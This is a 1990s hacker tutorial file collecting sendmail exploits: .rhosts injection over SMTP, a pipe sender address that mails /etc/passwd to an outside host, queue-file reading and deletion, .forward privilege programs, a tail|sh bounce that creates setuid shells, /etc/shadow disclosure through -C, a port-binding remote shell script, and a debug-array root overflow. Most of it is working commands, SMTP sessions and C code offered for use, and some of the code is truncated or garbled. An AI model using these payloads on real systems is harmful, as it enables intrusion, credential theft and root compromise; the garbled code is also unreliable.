sendmail2.txt

黑客培训教程

 random garbage

 .

 rcpt to: /home/zen/.rhosts

 mail from: zen

 data

 evil.com

 .

 quit

 EOSM

 evil % /bin/sh evil_sendmail

 Trying 128.128.128.1

 Connected to victim.com

 Escape character is '^]'.

 Connection closed by foreign host.

 evil % rlogin victim.com -l zen

         Welcome to victim.com!

 victim %

'-oQ' = DuNNo =

This bug involves the '-q' and the '-oQ' options and causes any file to be
deleted and read. You should create a 'qf'-type file, in the
/usr/spool/mqueue dir, like this:

P28

T599831504

Dfilename

Suser

Ruser

H?P?return-path:

H?F?from: user (User Name)

H?x?full-name: User Name

HTo: user

Hsubject: Gotcha

after the command `sendmail -q -oQ' is issued, file `filename' will be
deleted and its content will be mailed to 'user'.

- - - - The 'oQ' sets the 'Q' option ,which selects the dir in which to
queue messages The 'q' make the daemon to process the queue - - - -

'|PROGRAM ' = TeSTeD oN 5.55 = ...may be others

Anyone can specify arbitrary shell commands and/or pathnames for the sender
and/or destination address. A typical attack to get the password file is:

 % telnet target.com 25

 Trying 123.456.789.0...

 Connected to target.com

 Escape character is '^]'.

 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51

 mail from: "|/bin/mail me@myhost.com < /etc/passwd"

 250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok

 rcpt to: mickeymouse

 550 mickeymouse... User unknown

 data

 354 Enter mail, end with "." on a line by itself

 .

 250 Mail accepted

 quit

 Connection closed by foreign host.

 %

.forward = 5.61 =

When delivering to files and programs, `sendmail' does not do an
`initgroups(3)' after forking on final delivery. As a result, the sender's
group list remains in effect throughout this stage. This is particularly
serious when root is sending the mail since a program executed out of a
`.forward' file gains interesting privileges like `wheel' and `kmem'. A
related hole can be broken down into a "problem" and an "aggravation". The
"problem" is that queued local mail no longer has the original recipient's
uid associated with it. Control files only store a list of exploded
recipients (i.e. users, files and programs) -- one per line -- each
prefaced with an `R'.

So, after an address resolves to the local machine and has undergone alias
and ".forward" expansion, if the letter happens to get queued, on the
succeeding queue run sendmail doesnt know who to run the final delivery as.
The "aggravation" is that, when doing this final delivery of queued local
mail, sendmail will `setuid()' itself to the sender's uid if it is
available; in general, the sender's uid will be used when the sender is on
the local machine. As a result, a user can run a program as anyone who
sends them mail from the local machine. There is also an added
"complication"; the default uid and gid are also set to the sender when
delivering mail! Since the default uid and gid are only used when calling
`setuid()' and `setgid()' (to reset the uid/gid before doing final
delivery), these variables should never be set to the sender.

              |------------------------------ Local compromise
                      ------------------------------|

Save the following program as "sploit.c" changing MYUID to your user id.
Compile "sploit.c" producing the executable "sploit" in your home
directory. Create a ".forward" file containing:

     \<user>, "|<path>/sploit"

[change to your username so you dont lose mail (unless, of course, you'd
rather lose mail) and set <path> to your home directory path (where sploit
lives)] Now, as another user, send yourself some mail. Note that the sploit
program defers delivery the first time thru; check out "/tmp/whoami" to see
that sploit ran as you. Now, run your mail queue (or open a beer and wait
for sendmail to run it). After the queue run, note that the sploit accepted
the letter and returned a successful exit status; check out "/tmp/whoami"
again to see that this time, sploit ran as the sender! You can also use
"sploit.c" to test for the root initgroups() hole by checking the group
list when "sploit" was first called.

     #include <sys/param.h>

     #include <sys/types.h>

     #include <stdio.h>

     #include <sysexits.h>

     #include <pwd.h>

     #include <grp.h>

     #define MYUID 777 /* your uid (i.e. your ".forward" invokes this) */

     #definegetuser(uid)getpwuid(uid)->pw_name/* assume valid uid */

     #definegetgrp(gid)getgrgid(gid)->gr_name/* assume valid gid */

     main()

     {

     FILE *fp;

     uid_t myuid;

     int i, rval, ngrps, grplst[NGROUPS];

     if ((myuid = getuid()) == MYUID)

     rval = EX_TEMPFAIL;

     else

     rval = EX_OK;

     if ((fp = fopen("/tmp/whoami", "a")) != NULL) {

     /* real user/group ids */

     fprintf(fp, "%susr:%s grp:%s",

     (rval == EX_OK)? "": "Def> ",

     getuser(myuid), getgrp(getgid()));

     /* effective user/group ids */

     fprintf(fp, " eusr:%s egrp:%s",

     getuser(geteuid()), getgrp(getegid()));

     /* group list */

     if ((ngrps = getgroups(NGROUPS, grplst)) > 0) {

     fprintf(fp, " grps:");

     for (i = 0; i < ngrps; i++)

     fprintf(fp, " %s", getgrp(grplst[i]));

     }

     fprintf(fp, "\n");

     (void) fclose(fp);

     }

     exit(rval);

     }

--------------------- CuT HeRe -------------------------------------------------

=====================  trick for sendmail 5.61  ===========================

/*

 * 1) set the #define UID, at the top of the program to be your's

 * 2) create a file: /tmp/.shell, which is a script to make a suid shell

 * 3) compile the program and name it say, /tmp/.magic

 * 4) create a .forward file containing: '|/tmp/.magic'

 * 5) 'telnet yoursystem 25' and send yourself some fakemail from whoever

 *    you want a shell from (but not root :-( RATS!)

 * 6) wait abit, it usually works ...

 */

#define UID 777   /* change to your uid */

#include <sys/param.h>

#include <sys/types.h>

#include <stdio.h>

#include <sysexits.h>

#include <pwd.h>

#include <grp.h>

#define SHELLFILE  "/tmp/.shell"

main()

        int myuid, rval;

        if ((myuid = getuid()) == UID)

                rval = EX_TEMPFAIL;

        else {

                rval = EX_OK;

                system(SHELLFILE);

        }

        exit(rval);

}

------------------------------ CuT HeRe --------------------------------

Tail creates a daemon shell = TeSTeD oN 5.65 =

Through this sendmail bug, it is possible to become uid daemon (or whatever
your sendmail delivers non-user mail as), or the uid of any user. The
specifics are as follows:

   * The envelope From: field, or possibly the Errors-To: header (but I've
     not tested it), must be set to the pipe through a bounce of your mail
     will be returned. Typically this is executed by uid daemon.
   * An error must be caused in the message such that sendmail will send a
     bounce to the From: envelope (or possibly to Errors-To:).

These two conditions are all that is necessary to exploit the bug.
Typically the simplest thing to pipe to is



        |/usr/ucb/tail|/usr/bin/sh

aka     |/usr/ucb/tail|/bin/sh

That's for SunOS 4.1.3. Other systems may have tail in /usr/bin or /bin/;
the PATH is important in the case.

The condition we have used to generate an error is an invalid
Return-Receipt-To: header. There are a plethora of other ways to do so, and
some of them may depend on the specifics of your sendmail; be forewarned.

The last ten lines of your message should contain whatever you wish to do
as uid daemon.

---cut here

[panix!jhawk] |% telnet panix.com 25

Trying 198.7.0.2 ...

Connected to panix.com.

Escape character is '^]'.

220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13

-0500

HELO

250 Hello panix.com, why do you call yourself ?

MAIL FROM: |/usr/ucb/tail|/usr/bin/sh

250 |/usr/ucb/tail|/usr/bin/sh... Sender ok

RCPT TO: root

250 root... Recipient ok

DATA

354 Enter mail, end with @.@ on a line by itself

 From: jhawk"panix.com (John Hawkinson)

  To: jhawk"panix.com (John Hawkinson)

  Return-Receipt-To: |foobar

  Subject: This is a large hole in the ground.

  X-Disclaimer: We take no responsibility for what might happen

  Hi there. Wanna play ball?

  #!/bin/sh

  #The above line is just in case :-)

  echo This is a Serious Bug > /tmp/bug

  echo id reports: >> /tmp/bug

  /usr/bin/id >> /tmp/bug

  echo Fixing this would be good >> /tmp/bug

  cp /bin/sh /tmp/bugshell

  chmod u+s /tmp/bugshell

  echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug

  chmod ugo+rx /tmp/bugshell

.

250 Ok

quit

221 panix.com closing connection

------------------------- CuT HeRe ----------------------------------------

"-C" = oLD =

Read any file. Using the '-C' option causes an alternative configuration
file to be used, if the file is a protected file which is actually not a
send mail configuration file, `sendmail' will print out some contents of
the file as an error message.

It is reported working on DYNIX (3.0.14) and ULTRIX (2.X)

$ sendmail -C /etc/shadow

<contents of /etc/shadow>



4.1 = TeSTeD oN 4.1 =

It allows remote access as bin...and since bin owns the /etc dir you can
gain root.

Rsend needs mconnect, which is a binary, which just connects to the place
and sends the data. You can get rid the of ()'s at the beginninga and end
of the script, and get rid of the mconnect line, and run like ./rsend >
file, then ascii U/L the file to port 25...If it says a lot of stuff like
"Command Ununown" 25 times, then it didn't work.

Here's rsend:

#!/bin/sh

# Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)

#

# This material is copyrighted by Scott Chasin, 1992, 1993. The

# usual standard disclaimer applies, especially the fact that the

# author is not liable for any damages caused by direct or indirect

# use of the information or functionality provided by this program.

#

# Description:

#

# Exploit NEW sendmail hole  and bind a port so we can spawn a program.

# Not for distribution under any circumstances

#

# Usage: smail

# default: smail   <7001>

port=$3

user=$2

cmd=$4

if [ -z "$2" ]; then

   user=daemon

fi

if [ -z "$3" ]; then

   port=7002

fi

if [ -z "$4" ]; then

   cmd="/bin/csh -i"

fi

(

sleep 4

echo "helo"

echo "mail from: |"

echo "rcpt to: bounce"

echo "data"

echo "."

sleep 3

echo "mail from: $user"

echo "rcpt to: | sed '1,/^$/d' | sh"

echo "data"

echo "cat > /tmp/a.c <

#include <sys/signal.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <netdb.h>

reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;

int **av;{struct sockaddr_in mya;struct servent *sp

;fd_set muf;int myfd,new,x,maxfd=getdtablesize();

signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,

0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,

sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))

==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port

=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,

(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,

1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if

(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto

loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()

==0){for(x=2;x

Or you can also ul this to port 25. BTW, it gets you in by running a
program that listens to port 7008... you telnet to port 7008. You can then
proceed to create new users in /etc/passwd because you own the /etc
dir...you need to type a ; after every command, and it gives you 1 error
every command...ignore it. The process may be noticed by a few admins.

helo

mail from: |

rcpt to: bounce

data

.

mail from: bin

rcpt to: | sed '1,/^$/d' | sh

data

cat > /tmp/a.c <

#include <sys/signal.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <netdb.h>

reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;

int **av;{struct sockaddr_in mya;struct servent *sp

;fd_set muf;int myfd,new,x,maxfd=getdtablesize();

signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,

0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,

sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))

==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port

=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,

(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,

1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if

(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto

loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()

==0){for(x=2;x

-d########### = TeSTeD oN SunOS & SunOS with Sendmail8.6.4 =

This bug is present in all 8.X.X sendmail versions prior to 8.6.7 Here
follow excerpts from Michael Widner's message on Bugtraq with his script
for SunOs and Solaris, and another script tested on SunOS 5.2 with sendmail
8.6.4:

"The important thing to know is that if your sendmail crashes when you pass
it something like -d387654321 then it can most likely be exploited to gain
root access.

Without going into much detail, -dx.y writes y into the debug array as
array[x]=y. Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check. Find a key location
before the debug array, over write it, and you're in business.

The problem in trying to create a generic script is that the 'key'
locations have different offsets from the debug array for every version of
sendmail. Sometimes they're easy to locate if you can get a core, but
sometimes it is tough to get a core w/o already being root. Also, sometimes
a core tells you nothing.

The following script is Sun specific, and patches are now available for all
versions of Sun sendmail. The script creates a suid root owned copy of
/bin/sh and places it in /tmp. If you're hacking solaris, I'd suggest you
choose some program other than /bin/sh. "

#!/bin/sh

# This script takes advantage of sendmail's (mis)interpretation of

# very large unsigned ints as signed ints when accessing the debug

# array.  As it, it will work with the 8 versions of sun sendmail

# that I have access to.  Perhaps I'll update it if I find new

# versions of sun sendmail.

# NOTE:  This is a Sun specific script.  Don't expect it to work with

#        any non-sun sendmail.

# -Michael R. Widner (atreus)        3/25/94

#